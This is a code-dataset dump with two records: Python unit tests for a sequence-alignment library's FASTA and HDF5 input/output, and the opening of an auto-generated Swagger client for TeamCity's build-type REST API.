03efb92b7391f60e6d1974709c67c7770eede10d
|
[
"MIT"
] | null | null | null |
import unittest
import os
class TestLoadFasta(unittest.TestCase):
    """Exercise align_io.load_fasta: invalid-letter policies and column masks."""

    @staticmethod
    def _data(name):
        # All FASTA fixtures live under test_data/.
        return os.path.join('test_data', name)

    def test_protein_unchanged_invalid(self):
        from multicov.alignment import Alignment
        from multicov.align_io import load_fasta
        from multicov.alphabet import protein_alphabet
        result = load_fasta(self._data('test_aln1.fasta'), protein_alphabet,
                            invalid_letter_policy='unchanged')
        expected = Alignment(['IVGGYTCQ', 'XVGGTEAQ', 'IGG-KDT-'], alphabet=protein_alphabet)
        expected.annotations['name'] = ['seq1', 'seq2', 'seq3']
        self.assertEqual(result, expected)

    def test_protein_keep_annot_ws(self):
        from multicov.alignment import Alignment
        from multicov.align_io import load_fasta
        from multicov.alphabet import protein_alphabet
        result = load_fasta(self._data('test_aln1.fasta'), protein_alphabet,
                            strip_ws_in_annot=False)
        expected = Alignment(['IVGGYTCQ', '-VGGTEAQ', 'IGG-KDT-'], alphabet=protein_alphabet)
        # Whitespace in the annotation lines must survive when stripping is off.
        expected.annotations['name'] = ['seq1 ', ' seq2', 'seq3']
        self.assertEqual(result, expected)

    def test_dna_unchanged_invalid(self):
        from multicov.alignment import Alignment
        from multicov.align_io import load_fasta
        from multicov.alphabet import dna_alphabet
        result = load_fasta(self._data('test_aln2.fasta'), dna_alphabet,
                            invalid_letter_policy='unchanged')
        expected = Alignment(['GATTACA', 'ACCA--T', 'G.c-a-c'], dna_alphabet)
        expected.annotations['name'] = ['one', 'sequence', 'one line']
        self.assertEqual(result, expected)

    def test_replace_invalid_by_gap_protein(self):
        from multicov.alignment import Alignment
        from multicov.align_io import load_fasta
        from multicov.alphabet import protein_alphabet
        result = load_fasta(self._data('test_aln1.fasta'), protein_alphabet,
                            invalid_letter_policy='gap')
        expected = Alignment(['IVGGYTCQ', '-VGGTEAQ', 'IGG-KDT-'], alphabet=protein_alphabet)
        expected.annotations['name'] = ['seq1', 'seq2', 'seq3']
        self.assertEqual(result, expected)

    def test_replace_invalid_by_gap_dna(self):
        from multicov.alignment import Alignment
        from multicov.align_io import load_fasta
        from multicov.alphabet import dna_alphabet
        result = load_fasta(self._data('test_aln2.fasta'), dna_alphabet,
                            invalid_letter_policy='gap')
        expected = Alignment(['GATTACA', 'ACCA--T', 'G------'], dna_alphabet)
        expected.annotations['name'] = ['one', 'sequence', 'one line']
        self.assertEqual(result, expected)

    def test_replace_invalid_by_uppercase_then_gap(self):
        from multicov.alignment import Alignment
        from multicov.align_io import load_fasta
        from multicov.alphabet import dna_alphabet
        result = load_fasta(self._data('test_aln2.fasta'), dna_alphabet,
                            invalid_letter_policy='uppergap')
        expected = Alignment(['GATTACA', 'ACCA--T', 'G-C-A-C'], dna_alphabet)
        expected.annotations['name'] = ['one', 'sequence', 'one line']
        self.assertEqual(result, expected)

    def test_replace_invalid_by_uppercase_then_leave(self):
        from multicov.alignment import Alignment
        from multicov.align_io import load_fasta
        from multicov.alphabet import dna_alphabet
        result = load_fasta(self._data('test_aln2.fasta'), dna_alphabet,
                            invalid_letter_policy='upper')
        expected = Alignment(['GATTACA', 'ACCA--T', 'G.C-A-C'], dna_alphabet)
        expected.annotations['name'] = ['one', 'sequence', 'one line']
        self.assertEqual(result, expected)

    def test_mask_from_first_seq(self):
        from multicov.alignment import Alignment
        from multicov.align_io import load_fasta
        from multicov.alphabet import protein_alphabet
        from numpy import in1d
        result = load_fasta(self._data('test_aln1.fasta'), protein_alphabet,
                            invalid_letter_policy='unchanged',
                            mask_fct=lambda s: ~in1d(list(s), ['V', 'G']))
        expected = Alignment(['IYTCQ', 'XTEAQ', 'IKDT-'], alphabet=protein_alphabet)
        expected.annotations['name'] = ['seq1', 'seq2', 'seq3']
        self.assertEqual(result, expected)

    def test_mask_before_process(self):
        from multicov.alignment import ReferenceMapping
        from multicov.align_io import load_fasta
        from multicov.alphabet import protein_alphabet
        result = load_fasta(self._data('test_aln3.fasta'), protein_alphabet,
                            invalid_letter_policy='upper',
                            mask_fct=lambda s: [not ch.islower() for ch in s])
        baseline = load_fasta(self._data('test_aln3.fasta'), protein_alphabet,
                              invalid_letter_policy='unchanged')
        # The mask must be computed on the raw (unprocessed) first sequence.
        keep = [not ch.islower() for ch in baseline[0, :]]
        expected = baseline.truncate_columns(keep)
        expected.reference = ReferenceMapping(list(range(expected.data.shape[1])))
        self.assertEqual(result, expected)

    def test_mask_upper(self):
        from multicov.alignment import ReferenceMapping
        from multicov.align_io import load_fasta
        from multicov.alphabet import protein_alphabet
        result = load_fasta(self._data('test_aln3.fasta'), protein_alphabet,
                            invalid_letter_policy='upper',
                            mask_fct='upper')
        baseline = load_fasta(self._data('test_aln3.fasta'), protein_alphabet,
                              invalid_letter_policy='unchanged')
        # 'upper' keeps uppercase columns and drops '.' columns of the first row.
        keep = [not ch.islower() and ch != '.' for ch in baseline[0, :]]
        expected = baseline.truncate_columns(keep)
        expected.reference = ReferenceMapping(list(range(expected.data.shape[1])))
        self.assertEqual(result, expected)

    def test_mask_upper_gap(self):
        from multicov.alignment import ReferenceMapping
        from multicov.align_io import load_fasta
        from multicov.alphabet import protein_alphabet
        result = load_fasta(self._data('test_aln3.fasta'), protein_alphabet,
                            invalid_letter_policy='upper',
                            mask_fct='uppernogap')
        baseline = load_fasta(self._data('test_aln3.fasta'), protein_alphabet,
                              invalid_letter_policy='unchanged')
        # 'uppernogap' additionally drops '-' columns of the first row.
        keep = [not ch.islower() and ch != '.' and ch != '-' for ch in baseline[0, :]]
        expected = baseline.truncate_columns(keep)
        expected.reference = ReferenceMapping(list(range(expected.data.shape[1])))
        self.assertEqual(result, expected)
class TestHDFStoreIO(unittest.TestCase):
    """Load and round-trip tests for HDF5 alignment serialization."""

    def test_load(self):
        from multicov.align_io import from_hdf
        from multicov.alignment import Alignment
        from multicov.alphabet import protein_alphabet
        from pandas import HDFStore
        h5 = HDFStore(os.path.join('test_data', 'test_aln.h5'), 'r')
        loaded = from_hdf(h5, 'align1')
        expected = Alignment(['IVGGYTCQ', '-VGGTEAQ', 'IGG-KDT-'], protein_alphabet)
        # Sequence weights stored alongside the alignment must come back too.
        expected.annotations['seqw'] = [0.5, 1, 0.5]
        h5.close()
        self.assertEqual(loaded, expected)

    def test_load_multi_alpha(self):
        from multicov.align_io import from_hdf
        from multicov.alignment import Alignment
        from multicov.alphabet import protein_alphabet, dna_alphabet
        from pandas import HDFStore
        h5 = HDFStore(os.path.join('test_data', 'test_aln.h5'), 'r')
        loaded = from_hdf(h5, 'align2')
        # Build the expected mixed-alphabet alignment: protein block + DNA block.
        expected = Alignment(['IVGGYTCQ', '-VGGTEAQ', 'IGG-KDT-'], protein_alphabet)
        dna_part = Alignment(['AGCT', '-G-G', 'TA-T'], dna_alphabet)
        expected.add(dna_part)
        h5.close()
        self.assertEqual(loaded, expected)

    def test_roundtrip(self):
        from multicov.align_io import from_hdf, to_hdf
        from multicov.alignment import Alignment
        from multicov.alphabet import protein_alphabet, dna_alphabet
        from pandas import HDFStore
        original = Alignment(['IVGGYTCQ', '-VGGTEAQ', 'IGG-KDT-'], protein_alphabet)
        original.add(Alignment(['AGCT', '-G-G', 'TA-T'], dna_alphabet))
        tmp_path = os.path.join('test_data', 'tmp.h5')
        # Write, close, reopen read-only, reload, then clean up the temp file.
        writer = HDFStore(tmp_path, 'w')
        to_hdf(original, writer, 'test_align')
        writer.close()
        reader = HDFStore(tmp_path, 'r')
        reloaded = from_hdf(reader, 'test_align')
        reader.close()
        os.remove(tmp_path)
        self.assertEqual(original, reloaded)
| 50.508671
| 120
| 0.657931
| 1,027
| 8,738
| 5.380721
| 0.114898
| 0.091205
| 0.034383
| 0.048136
| 0.908252
| 0.898661
| 0.895223
| 0.871878
| 0.818675
| 0.805646
| 0
| 0.008719
| 0.225566
| 8,738
| 172
| 121
| 50.802326
| 0.807891
| 0
| 0
| 0.642384
| 0
| 0
| 0.11387
| 0
| 0
| 0
| 0
| 0
| 0.092715
| 1
| 0.092715
| false
| 0
| 0.317881
| 0
| 0.423841
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
20a03995ba16e1d38a9e7622987f2f7e19149e19
| 510,655
|
py
|
Python
|
dohq_teamcity/api/build_type_api.py
|
DenKoren/teamcity
|
69acb4d1402c316129b4602882a9cce2d55cf926
|
[
"MIT"
] | 23
|
2018-10-19T07:28:45.000Z
|
2021-11-12T12:46:09.000Z
|
dohq_teamcity/api/build_type_api.py
|
DenKoren/teamcity
|
69acb4d1402c316129b4602882a9cce2d55cf926
|
[
"MIT"
] | 31
|
2018-10-16T05:53:11.000Z
|
2021-09-09T14:44:14.000Z
|
dohq_teamcity/api/build_type_api.py
|
DenKoren/teamcity
|
69acb4d1402c316129b4602882a9cce2d55cf926
|
[
"MIT"
] | 12
|
2018-10-28T23:00:17.000Z
|
2021-09-07T12:07:13.000Z
|
# coding: utf-8
"""
TeamCity REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 2018.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
from dohq_teamcity.custom.base_model import TeamCityObject
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from dohq_teamcity.models.agent_requirement import AgentRequirement # noqa: F401,E501
from dohq_teamcity.models.agent_requirements import AgentRequirements # noqa: F401,E501
from dohq_teamcity.models.artifact_dependencies import ArtifactDependencies # noqa: F401,E501
from dohq_teamcity.models.artifact_dependency import ArtifactDependency # noqa: F401,E501
from dohq_teamcity.models.branches import Branches # noqa: F401,E501
from dohq_teamcity.models.build import Build # noqa: F401,E501
from dohq_teamcity.models.build_type import BuildType # noqa: F401,E501
from dohq_teamcity.models.build_types import BuildTypes # noqa: F401,E501
from dohq_teamcity.models.builds import Builds # noqa: F401,E501
from dohq_teamcity.models.feature import Feature # noqa: F401,E501
from dohq_teamcity.models.features import Features # noqa: F401,E501
from dohq_teamcity.models.file import File # noqa: F401,E501
from dohq_teamcity.models.files import Files # noqa: F401,E501
from dohq_teamcity.models.investigations import Investigations # noqa: F401,E501
from dohq_teamcity.models.items import Items # noqa: F401,E501
from dohq_teamcity.models.model_property import ModelProperty # noqa: F401,E501
from dohq_teamcity.models.new_build_type_description import NewBuildTypeDescription # noqa: F401,E501
from dohq_teamcity.models.properties import Properties # noqa: F401,E501
from dohq_teamcity.models.snapshot_dependencies import SnapshotDependencies # noqa: F401,E501
from dohq_teamcity.models.snapshot_dependency import SnapshotDependency # noqa: F401,E501
from dohq_teamcity.models.step import Step # noqa: F401,E501
from dohq_teamcity.models.steps import Steps # noqa: F401,E501
from dohq_teamcity.models.tags import Tags # noqa: F401,E501
from dohq_teamcity.models.trigger import Trigger # noqa: F401,E501
from dohq_teamcity.models.triggers import Triggers # noqa: F401,E501
from dohq_teamcity.models.type import Type # noqa: F401,E501
from dohq_teamcity.models.vcs_labeling import VcsLabeling # noqa: F401,E501
from dohq_teamcity.models.vcs_root_entries import VcsRootEntries # noqa: F401,E501
from dohq_teamcity.models.vcs_root_entry import VcsRootEntry # noqa: F401,E501
from dohq_teamcity.models.vcs_root_instances import VcsRootInstances # noqa: F401,E501
class BuildTypeApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
base_name = 'BuildType'
    def __init__(self, api_client=None):
        # Store the injected API client; None means the caller wires one up later.
        self.api_client = api_client
def add_agent_requirement(self, bt_locator, **kwargs): # noqa: E501
"""add_agent_requirement # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_agent_requirement(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:param AgentRequirement body:
:return: AgentRequirement
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__add_agent_requirement_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__add_agent_requirement_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def add_artifact_dep(self, bt_locator, **kwargs): # noqa: E501
"""add_artifact_dep # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_artifact_dep(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:param ArtifactDependency body:
:return: ArtifactDependency
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__add_artifact_dep_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__add_artifact_dep_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def add_build_type(self, **kwargs): # noqa: E501
"""add_build_type # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_build_type(async_req=True)
>>> result = thread.get()
:param async_req: bool
:param BuildType body:
:param str fields:
:return: BuildType
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__add_build_type_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.__add_build_type_with_http_info(**kwargs) # noqa: E501
return data
def add_feature(self, bt_locator, **kwargs): # noqa: E501
"""add_feature # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_feature(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:param Feature body:
:return: Feature
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__add_feature_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__add_feature_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def add_feature_parameter(self, bt_locator, feature_id, parameter_name, **kwargs): # noqa: E501
"""add_feature_parameter # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_feature_parameter(bt_locator, feature_id, parameter_name, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str feature_id: (required)
:param str parameter_name: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__add_feature_parameter_with_http_info(bt_locator, feature_id, parameter_name, **kwargs) # noqa: E501
else:
(data) = self.__add_feature_parameter_with_http_info(bt_locator, feature_id, parameter_name, **kwargs) # noqa: E501
return data
def add_snapshot_dep(self, bt_locator, **kwargs): # noqa: E501
"""add_snapshot_dep # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_snapshot_dep(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:param SnapshotDependency body:
:return: SnapshotDependency
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__add_snapshot_dep_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__add_snapshot_dep_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def add_step(self, bt_locator, **kwargs): # noqa: E501
"""add_step # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_step(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:param Step body:
:return: Step
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__add_step_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__add_step_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def add_step_parameter(self, bt_locator, step_id, parameter_name, **kwargs): # noqa: E501
"""add_step_parameter # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_step_parameter(bt_locator, step_id, parameter_name, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str step_id: (required)
:param str parameter_name: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__add_step_parameter_with_http_info(bt_locator, step_id, parameter_name, **kwargs) # noqa: E501
else:
(data) = self.__add_step_parameter_with_http_info(bt_locator, step_id, parameter_name, **kwargs) # noqa: E501
return data
def add_template(self, bt_locator, **kwargs): # noqa: E501
"""add_template # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_template(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param BuildType body:
:param bool optimize_settings:
:param str fields:
:return: BuildType
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__add_template_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__add_template_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def add_trigger(self, bt_locator, **kwargs): # noqa: E501
"""add_trigger # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_trigger(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:param Trigger body:
:return: Trigger
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__add_trigger_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__add_trigger_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def add_vcs_root_entry(self, bt_locator, **kwargs): # noqa: E501
"""add_vcs_root_entry # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_vcs_root_entry(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param VcsRootEntry body:
:param str fields:
:return: VcsRootEntry
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__add_vcs_root_entry_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__add_vcs_root_entry_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def change_artifact_dep_setting(self, bt_locator, artifact_dep_locator, field_name, **kwargs): # noqa: E501
"""change_artifact_dep_setting # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.change_artifact_dep_setting(bt_locator, artifact_dep_locator, field_name, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str artifact_dep_locator: (required)
:param str field_name: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__change_artifact_dep_setting_with_http_info(bt_locator, artifact_dep_locator, field_name, **kwargs) # noqa: E501
else:
(data) = self.__change_artifact_dep_setting_with_http_info(bt_locator, artifact_dep_locator, field_name, **kwargs) # noqa: E501
return data
def change_feature_setting(self, bt_locator, feature_id, name, **kwargs): # noqa: E501
"""change_feature_setting # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.change_feature_setting(bt_locator, feature_id, name, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str feature_id: (required)
:param str name: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__change_feature_setting_with_http_info(bt_locator, feature_id, name, **kwargs) # noqa: E501
else:
(data) = self.__change_feature_setting_with_http_info(bt_locator, feature_id, name, **kwargs) # noqa: E501
return data
def change_requirement_setting(self, bt_locator, agent_requirement_locator, field_name, **kwargs): # noqa: E501
"""change_requirement_setting # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.change_requirement_setting(bt_locator, agent_requirement_locator, field_name, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str agent_requirement_locator: (required)
:param str field_name: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__change_requirement_setting_with_http_info(bt_locator, agent_requirement_locator, field_name, **kwargs) # noqa: E501
else:
(data) = self.__change_requirement_setting_with_http_info(bt_locator, agent_requirement_locator, field_name, **kwargs) # noqa: E501
return data
def change_step_setting(self, bt_locator, step_id, field_name, **kwargs): # noqa: E501
"""change_step_setting # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.change_step_setting(bt_locator, step_id, field_name, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str step_id: (required)
:param str field_name: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__change_step_setting_with_http_info(bt_locator, step_id, field_name, **kwargs) # noqa: E501
else:
(data) = self.__change_step_setting_with_http_info(bt_locator, step_id, field_name, **kwargs) # noqa: E501
return data
def change_trigger_setting(self, bt_locator, trigger_locator, field_name, **kwargs): # noqa: E501
"""change_trigger_setting # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.change_trigger_setting(bt_locator, trigger_locator, field_name, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str trigger_locator: (required)
:param str field_name: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__change_trigger_setting_with_http_info(bt_locator, trigger_locator, field_name, **kwargs) # noqa: E501
else:
(data) = self.__change_trigger_setting_with_http_info(bt_locator, trigger_locator, field_name, **kwargs) # noqa: E501
return data
def delete_agent_requirement(self, bt_locator, agent_requirement_locator, **kwargs): # noqa: E501
"""delete_agent_requirement # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_agent_requirement(bt_locator, agent_requirement_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str agent_requirement_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__delete_agent_requirement_with_http_info(bt_locator, agent_requirement_locator, **kwargs) # noqa: E501
else:
(data) = self.__delete_agent_requirement_with_http_info(bt_locator, agent_requirement_locator, **kwargs) # noqa: E501
return data
def delete_all_parameters(self, bt_locator, **kwargs): # noqa: E501
"""delete_all_parameters # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_all_parameters(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__delete_all_parameters_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__delete_all_parameters_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def delete_all_parameters_0(self, bt_locator, **kwargs): # noqa: E501
"""delete_all_parameters_0 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_all_parameters_0(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__delete_all_parameters_0_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__delete_all_parameters_0_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def delete_artifact_dep(self, bt_locator, artifact_dep_locator, **kwargs): # noqa: E501
"""delete_artifact_dep # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_artifact_dep(bt_locator, artifact_dep_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str artifact_dep_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__delete_artifact_dep_with_http_info(bt_locator, artifact_dep_locator, **kwargs) # noqa: E501
else:
(data) = self.__delete_artifact_dep_with_http_info(bt_locator, artifact_dep_locator, **kwargs) # noqa: E501
return data
def delete_build_type(self, bt_locator, **kwargs): # noqa: E501
"""delete_build_type # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_build_type(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__delete_build_type_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__delete_build_type_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def delete_feature(self, bt_locator, feature_id, **kwargs): # noqa: E501
"""delete_feature # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_feature(bt_locator, feature_id, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str feature_id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__delete_feature_with_http_info(bt_locator, feature_id, **kwargs) # noqa: E501
else:
(data) = self.__delete_feature_with_http_info(bt_locator, feature_id, **kwargs) # noqa: E501
return data
def delete_parameter(self, name, bt_locator, **kwargs): # noqa: E501
"""delete_parameter # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_parameter(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str name: (required)
:param str bt_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__delete_parameter_with_http_info(name, bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__delete_parameter_with_http_info(name, bt_locator, **kwargs) # noqa: E501
return data
def delete_parameter_0(self, name, bt_locator, **kwargs): # noqa: E501
"""delete_parameter_0 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_parameter_0(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str name: (required)
:param str bt_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__delete_parameter_0_with_http_info(name, bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__delete_parameter_0_with_http_info(name, bt_locator, **kwargs) # noqa: E501
return data
def delete_snapshot_dep(self, bt_locator, snapshot_dep_locator, **kwargs): # noqa: E501
"""delete_snapshot_dep # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_snapshot_dep(bt_locator, snapshot_dep_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str snapshot_dep_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__delete_snapshot_dep_with_http_info(bt_locator, snapshot_dep_locator, **kwargs) # noqa: E501
else:
(data) = self.__delete_snapshot_dep_with_http_info(bt_locator, snapshot_dep_locator, **kwargs) # noqa: E501
return data
def delete_step(self, bt_locator, step_id, **kwargs): # noqa: E501
"""delete_step # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_step(bt_locator, step_id, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str step_id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__delete_step_with_http_info(bt_locator, step_id, **kwargs) # noqa: E501
else:
(data) = self.__delete_step_with_http_info(bt_locator, step_id, **kwargs) # noqa: E501
return data
def delete_trigger(self, bt_locator, trigger_locator, **kwargs): # noqa: E501
"""delete_trigger # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_trigger(bt_locator, trigger_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str trigger_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__delete_trigger_with_http_info(bt_locator, trigger_locator, **kwargs) # noqa: E501
else:
(data) = self.__delete_trigger_with_http_info(bt_locator, trigger_locator, **kwargs) # noqa: E501
return data
